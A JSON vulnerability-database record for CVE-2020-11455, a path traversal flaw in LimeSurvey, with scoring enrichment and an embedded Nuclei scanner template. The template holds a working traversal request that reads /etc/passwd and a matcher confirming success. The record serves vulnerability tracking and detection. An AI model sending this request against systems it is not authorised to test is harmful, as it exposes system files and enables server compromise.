{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-11455/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-11455/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-11455/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-11455/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-11455/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-11455"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-11455"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.97179,
      "kev": false,
      "percentile": 0.99892
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-11455.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2020-11455\n\ninfo:\n  name: LimeSurvey 4.1.11 - Local File Inclusion\n  author: daffainfo\n  severity: critical\n  description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.\n  remediation: |\n    Upgrade to the latest version of LimeSurvey (4.1.12 or higher) which includes a fix for this vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/48297\n    - https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b\n    - http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-11455\n    - https://github.com/KayCHENvip/vulnerability-poc\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-11455\n    cwe-id: CWE-22\n    epss-score: 0.97179\n    epss-percentile: 0.99892\n    cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: limesurvey\n    product: limesurvey\n  tags: cve2020,cve,lfi,edb,packetstorm,limesurvey,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502205588031a6ac9d32a538fb3f61ca6508ce04f698c762bdd98e86c21c27e4e9704022100ac0fbe9fdd25fb58448177002ac7dd9f34df1e0c17dcd028c3a6644005cc27e4:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-11455"
}